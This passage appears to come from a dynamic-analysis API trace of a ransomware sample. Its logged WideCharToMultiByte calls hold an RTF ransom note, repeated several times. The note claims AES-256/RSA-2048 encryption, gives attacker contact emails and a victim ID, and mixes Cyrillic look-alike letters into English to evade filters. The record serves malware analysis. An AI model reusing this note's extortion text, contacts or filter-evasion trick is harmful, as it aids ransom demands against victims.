lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.724] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in 